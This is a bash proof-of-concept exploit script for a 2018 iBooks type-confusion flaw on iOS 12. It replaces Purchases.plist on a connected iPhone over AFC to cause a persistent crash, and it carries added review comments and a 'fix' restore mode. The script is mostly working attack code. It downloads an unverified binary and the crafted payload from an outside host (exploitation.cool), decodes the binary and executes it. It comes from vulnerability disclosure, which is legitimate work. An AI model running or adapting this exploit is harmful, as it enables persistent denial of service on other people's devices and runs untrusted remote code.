#!/usr/bin/env bash
### iBooks iOS 12 type confusion vulnerability / persistent DoS
### Created by Sem Voigtländer on 09/25/2018.
### Licensed under the MIT License
### This was an unpatched (0-day) issue at the time of writing (September 2018).
### DESCRIPTION
###
### iBooks uses a propertylist for loading the iBooks download files.
### This property list is exposed through the AFC (Apple File Conduit) service that a connected host uses, where it can be read, written and deleted.
### An attacker with AFC access can corrupt iBooks' memory by replacing the Path value in this file with a value of a different type (a type confusion).
### iBooks parses this value without checking its type when it loads, so the memory corruption is triggered on startup.
### Because the read happens during iBooks' initialization, the crash is persistent across reboots and occurs immediately every time iBooks is opened.
### The issue can be resolved by validating the type of the Path value before using it, and by moving the plist into a sandboxed bundle container that is not reachable over AFC.
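# Usage: ./ibooks_09_2018.sh        -> back up and replace Books/Purchases/Purchases.plist on the connected device
#        ./ibooks_09_2018.sh fix    -> remove the crafted plist and restore the backup if one is present
#
# Requires afcclient (downloaded if missing) and optionally idevicedebug to launch iBooks.
set -euo pipefail

# CONSOLE INIT
clear 2>/dev/null || true   # purely cosmetic; must not abort the run under set -e
echo "==== iBooks Type Confusion - iOS <= 12 ===="
echo "= Created by: Sem Voigtlander ===="
echo "==========================================="
echo " "
echo "Please connect your iPhone and wait a few..."
sleep 10

# INITIAL SETUP
readonly AFCCLIENT_URL="http://exploitation.cool/plataoplomo/exploits/data/afcclient.bin"
readonly PAYLOAD_URL="http://exploitation.cool/plataoplomo/exploits/data/Purchases.plist"
readonly ORIG_DIR="$PWD"

# Use an unpredictable scratch directory instead of the fixed /tmp/ibooks_09_2018
# (a fixed name in a shared /tmp is open to symlink and pre-creation attacks by
# other local users) and remove it on every exit path via the trap below.
echo "Creating exploit tmp directory..."
WORKDIR="$(mktemp -d "${TMPDIR:-/tmp}/ibooks_09_2018.XXXXXX")" \
  || { echo "mktemp failed" >&2; exit 1; }
readonly WORKDIR
cleanup() { rm -rf -- "${WORKDIR:?}"; }
trap cleanup EXIT

if ! command -v afcclient >/dev/null 2>&1; then
  echo "Downloading requirements..."
  # SECURITY: this binary is fetched over plaintext HTTP with no checksum or
  # signature, so anyone on the network path can substitute it. Do not install
  # an unverified binary system-wide (the original moved it to /usr/local/bin);
  # keep it inside the scratch directory and use it for this run only.
  # TODO(review): pin a SHA-256 of the expected afcclient and verify it here.
  # -f makes curl fail on HTTP errors instead of saving an error page as the binary.
  curl -fsS -o "$WORKDIR/afcclient.bin" "$AFCCLIENT_URL" \
    || { echo "Failed to download afcclient" >&2; exit 1; }
  # --decode is accepted by both BSD/macOS and GNU base64 (the original -D/-i/-o is macOS-only).
  base64 --decode < "$WORKDIR/afcclient.bin" > "$WORKDIR/afcclient" \
    || { echo "afcclient download is not valid base64" >&2; exit 1; }
  rm -f -- "$WORKDIR/afcclient.bin"
  [[ -s "$WORKDIR/afcclient" ]] || { echo "Decoded afcclient is empty" >&2; exit 1; }
  chmod +x -- "$WORKDIR/afcclient"
  PATH="$WORKDIR:$PATH"
fi

# WORKSPACE SETUP
echo "Setting up exploit workspace"
cd -- "$WORKDIR" || exit 1
IBOOKS_DIR="Books"
VULNERABLE_FILE="Purchases/Purchases.plist"
readonly TARGET="$IBOOKS_DIR/$VULNERABLE_FILE"
# The backup is written outside the scratch directory so that cleanup does not
# delete it (the original saved Backup.dat into the tmp dir and then rm -rf'd it,
# leaving nothing to restore from).
readonly BACKUP="$ORIG_DIR/ibooks_Purchases_backup.plist"

# ARGUMENT HANDLING
# "fix": remove the crafted plist from the device, then put the original back if
# a backup from an earlier run is present next to where the script was started.
if [[ "${1:-}" == "fix" ]]; then
  afcclient rm "$TARGET" || true   # nothing to remove is fine
  if [[ -s "$BACKUP" ]]; then
    echo "Restoring original Purchases.plist from $BACKUP"
    afcclient put "$BACKUP" "$TARGET" || echo "Warning: restore failed; iBooks will recreate the file" >&2
  fi
  exit
fi

# PAYLOAD CREATION
echo "Creating payload..."
# Write the crafted plist straight to disk. The original piped it through
# `echo -e`, which rewrites backslash escapes and could corrupt the payload, and
# never checked the download, so an empty or HTML body would have been uploaded.
curl -fsS -o "Purchases.plist" "$PAYLOAD_URL" \
  || { echo "Failed to download payload" >&2; exit 1; }
[[ -s "Purchases.plist" ]] || { echo "Downloaded payload is empty" >&2; exit 1; }

# IPHONE BACKUP
echo "Backing up..."
if afcclient get "$TARGET" "$BACKUP"; then
  echo "Original saved to $BACKUP"
else
  # Not fatal: the file may not exist yet on a fresh device.
  echo "Warning: could not back up $TARGET" >&2
fi

# EXPLOITATION
echo "Uploading exploit..."
afcclient rm "$TARGET" || true   # may not exist; the put below is what matters
afcclient put "Purchases.plist" "$TARGET" || { echo "Upload failed" >&2; exit 1; }
rm -f -- "Purchases.plist"

# POST_EXPLOITATION
if command -v idevicedebug >/dev/null 2>&1; then
  printf 'Starting iBooks, make sure it is not open.\nIf it says ERROR: LOCKED please unlock your device or manually start iBooks...\n\n'
  sleep 2
  # A non-zero exit here is the expected outcome (iBooks crashing), so do not abort.
  idevicedebug -d run com.apple.iBooks || true
  printf '\niBooks has exited.\nIf it gave an exception the PoC worked!\n'
  echo "You can restart your device and open iBooks to verify it is persistant."
  echo "To fix ibooks simply run this with the following argument: fix"
else
  echo "Done, open ibooks!"
fi
# Scratch directory is removed by the EXIT trap; the backup in $ORIG_DIR is kept.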